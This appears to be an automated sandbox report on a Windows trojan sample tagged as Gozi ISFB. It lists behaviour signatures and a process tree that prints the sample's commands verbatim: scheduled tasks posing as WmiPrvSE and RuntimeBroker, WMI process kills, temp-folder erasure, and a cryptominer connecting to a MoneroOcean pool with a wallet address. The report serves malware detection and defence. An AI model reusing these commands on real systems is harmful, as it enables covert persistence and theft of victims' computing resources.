Analysis

  • max time kernel
    72s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    21/03/2022, 20:22

General

  • Target

    SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe

  • Size

    7.7MB

  • MD5

    7bf3a72a5287c6388cda810822c894a3

  • SHA1

    4c23e414457d18ceee367a19afbe0c51588c3df0

  • SHA256

    7ae4237b70f7233f779dbcde9db944e13472a1c4097baa4a17f5e769e0869476

  • SHA512

    014fa7d7ead618cdbead06ec8658b7c41baba40d1954358065b28f0eab824028a4b34263d187ed332a0e40b5e6bba64b027bf6cfadf638b0924ae96aba00d9c9

Malware Config

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 5 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with WMI 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1380
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "WmіPrvSE" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe" /f
        3⤵
        • Creates scheduled task(s)
        PID:2496
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "RuntіmeBroker" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe" /f
        3⤵
        • Creates scheduled task(s)
        PID:2660
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\" & ping -n 4 127.0.0.1 & erase %temp% /s /f /q
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\system32\PING.EXE
          ping -n 1 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:4032
        • C:\Windows\system32\xcopy.exe
          xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\"
          4⤵
            PID:4592
          • C:\Windows\system32\PING.EXE
            ping -n 4 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:2300
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3128
          • C:\Windows\system32\PING.EXE
            ping -n 1 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:4088
          • C:\Windows\system32\xcopy.exe
            xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
            4⤵
              PID:4016
      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe
        C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe
        1⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Checks whether UAC is enabled
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4720
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1408
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
            3⤵
            • Kills process with WMI
            PID:1396
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3468
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3492
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /C ping -n 2 127.0.0.1>%temp%\log2 && rd /s /q %appdata%\Sysfiles & rd /s /q %temp%
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:424
          • C:\Windows\system32\PING.EXE
            ping -n 2 127.0.0.1
            3⤵
            • Runs ping.exe
            PID:2164
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3964
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
            3⤵
              PID:3032
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & ping -n 10 127.0.0.1>%temp%\log1 && erase %temp% /s /f /q & rd /s /q %appdata%\Sysfiles
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4040
            • C:\Windows\system32\PING.EXE
              ping -n 10 127.0.0.1
              3⤵
              • Runs ping.exe
              PID:1460
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2360
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
              3⤵
              • Kills process with WMI
              • Suspicious use of AdjustPrivilegeToken
              PID:1656
          • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe
            "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe" -o gulf.moneroocean.stream:20128 -u 46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL -p x -k -v=0 --cpu-no-yield --randomx-cache-qos --tls -t 1
            2⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Loads dropped DLL
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Suspicious use of FindShellTrayWindow
            PID:400
        • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe
          C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe
          1⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3452
          • C:\Windows\System32\cleanmgr.exe
            "C:\Windows\System32\cleanmgr.exe" /setup
            2⤵
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:208
            • C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe
              C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe {F243B500-D086-4018-A5D7-26A3B538A770}
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              PID:3708

        Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/400-222-0x00000000001D0000-0x00000000001F0000-memory.dmp

                Filesize

                128KB

              • memory/400-221-0x0000000140000000-0x0000000140E83000-memory.dmp

                Filesize

                14.5MB

              • memory/400-220-0x0000000140000000-0x0000000140E83000-memory.dmp

                Filesize

                14.5MB

              • memory/400-219-0x00007FFE80030000-0x00007FFE80031000-memory.dmp

                Filesize

                4KB

              • memory/400-217-0x00007FFE80000000-0x00007FFE80002000-memory.dmp

                Filesize

                8KB

              • memory/400-218-0x0000000002070000-0x00000000020AD000-memory.dmp

                Filesize

                244KB

              • memory/400-216-0x00007FFEA05F0000-0x00007FFEA06AE000-memory.dmp

                Filesize

                760KB

              • memory/400-215-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp

                Filesize

                2.8MB

              • memory/1460-132-0x0000000000540000-0x000000000054E000-memory.dmp

                Filesize

                56KB

              • memory/1460-135-0x00007FFE82B80000-0x00007FFE83641000-memory.dmp

                Filesize

                10.8MB

              • memory/3452-139-0x0000000000250000-0x0000000000262000-memory.dmp

                Filesize

                72KB

              • memory/3452-140-0x00007FFE824D0000-0x00007FFE82F91000-memory.dmp

                Filesize

                10.8MB

              • memory/4720-165-0x000000003F280000-0x000000003FFAA000-memory.dmp

                Filesize

                13.2MB

              • memory/4720-214-0x000000001EFE0000-0x000000001EFE2000-memory.dmp

                Filesize

                8KB

              • memory/4720-166-0x00007FFE824D0000-0x00007FFE82F91000-memory.dmp

                Filesize

                10.8MB

              • memory/4720-151-0x00007FFE80030000-0x00007FFE80031000-memory.dmp

                Filesize

                4KB

              • memory/4720-150-0x00007FFE80000000-0x00007FFE80002000-memory.dmp

                Filesize

                8KB

              • memory/4720-149-0x00007FFEA05F0000-0x00007FFEA06AE000-memory.dmp

                Filesize

                760KB

              • memory/4720-141-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp

                Filesize

                2.8MB

              • memory/4720-143-0x0000000180000000-0x0000000180046000-memory.dmp

                Filesize

                280KB

              • memory/4720-148-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp

                Filesize

                2.8MB